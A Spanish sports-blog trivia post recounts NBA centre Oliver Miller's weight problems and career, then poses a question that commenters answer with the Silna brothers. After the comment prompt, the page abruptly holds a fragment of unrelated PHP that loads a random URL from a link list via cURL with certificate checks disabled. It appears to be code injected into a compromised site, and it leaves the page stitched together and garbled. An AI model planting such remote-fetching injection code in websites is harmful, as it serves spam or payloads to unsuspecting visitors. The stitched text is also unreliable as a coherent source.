Trivial #20:The Big “O”

18 de December de 2009 por TheDeerHunter

No habrá mucha gente por aquí que se acuerde de Oliver Miller. Seguramente sí lo hará el visionario GM de los Suns que le eligió en la primera ronda de 1992 (no ha llovido tanto) por delante de Latrell Sprewell o PJ Brown. Un 2,06 grande (de tamaño), talentoso, buen pasador y con mano para el tiro, pero también buen intimidador, que comenzó sus andaduras por la NBA tutelado por ese otro GRAN (éste sí, ilustre) El Gordo Barkley. No sabemos si el bueno de Sir Charles, además de enseñarle algunos trucos al poste bajo, también le guió por el maravilloso mundo de los tugurios de comida rápida, las deliciosas viandas hipercalóricas y los lípidos en sus distintas variedades.

El caso es que desde bien temprano, por encima de su tendencia a ponerse como un ceporro nos mostró cualidades baloncestísticas dignas de tener en cuenta. En su primer periplo con los recién nacidos Raptors llegó a promediar sus 13 puntos, 7.5 rebotes, 3 asistencias y 2 tapones. Números que ya firmarían más de uno y más de dos…

Pero ya sabéis que la cabra siempre tira al monte y según dicen las malas lenguas en medio de un partido con los Raptors, el coach Brendan Malone buscó a Miller para darle las indicaciones para salir a cancha. Oliver (nada que ver con Benji) no estaba. La versión oficial (la suya) es que había tenido que ir al baño (horrible visión), pero algunos testigos aseguraban haberle visto en ese preciso instante dando buena cuenta de una pizzaca familiar en el complejo comercial del recinto. ¡Vaya jugón! Sólo son rumores, por supuesto.

En fin, como es natural conforme aumentaba peligrosamente su tamaño (hasta los 140-150 kilos aprox. con 2.06 de estatura) disminuía su movilidad y capacidad de salto. Llegado el momento era más fácil saltarlo que rodearlo y en esas que vistiendo la camiseta de los Kings (bien ceñidita, por cierto) visitó la cancha de su ex-equipo y a su (ex) amigo el Gorilla no se le ocurrió otra que gastarle una bromilla. Al pobre O, lógicamente, no le hizo ni puñetera gracia y todo terminó en los tribunales. Curiosamente al año siguiente regresaría a la disciplina de los Suns, antes de aceptar una oferta de los Harlem Globe Trotters que no pudo rechazar. No sabemos si aquel año limaría asperezas con Gorilla. Igual terminaron yéndose juntos a tomar unas cañejas (y unas bravas, of course)

Lo más fuerte es que, después de que lo largaran de los HGT a los dos años por falta de motivación todavía algún crack lo fichó para los Wolves. Qué mal debían estar…

Vamos a por otra, ¿no?

¿Qué dos entrañables ancianitos cobran periódicamente auténticos pastizales provenientes de la liga no habiendo formado nunca parte de ella ni de ninguna de sus franquicias?

Comenta

6 comentarios a esta entrada

  1. sergio dice:
    #1

    No se exactamente a que os referis con la pregunta pero si se trata de ejecutivos dire dos a boleo:
    ANDREW L. MESSICK
    DAVID STERN

      Citar

  2. Hynreck dice:
    #2

    Deer, esto te viene bien para reforzar la moral…

      Citar

  3. sabas dice:
    #3

    Muy buena pregunta, lo lei una vez en gigantes que lo explicaba Paniagua. Si no recuerdo mal fue cuando la union de la NBA y la ABA, eron dueños de dos equipos que al final no formaron parte en la union. Esos tios se lo llevan crudo a la hora de repartir los beneficios de los equipos, eso si que es cazo mix.

      Citar

  4. rojorob dice:
    #4

    Ozzie Silna y Dan Silna. Lo reconozco, soy una rata y el punto debería ser para SABAS…, pero no lo puedo remediar, soy experto en maquillar estadísticas)

      Citar

  5. sergio dice:
    #5

    Aqui quien no corre vuela Rojorob jaja… Creo de hecho que a quien se referia SABAS era tambien a John Y. Brown, que tambien recibio un pastizal y acabo comprando los Celtics. No conocia a los hermanos Silna… todo lo que sea enriquecimiento cultural se valora…

    Tambien podia haber dicho los presidentes de la NBC y de la ESPN y cumpliria los requisitos de la pregunta… no sabia ni a q os referiais la verdad.

      Citar

  6. TheDeerHunter dice:
    #6

    no me lo puedo creer

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>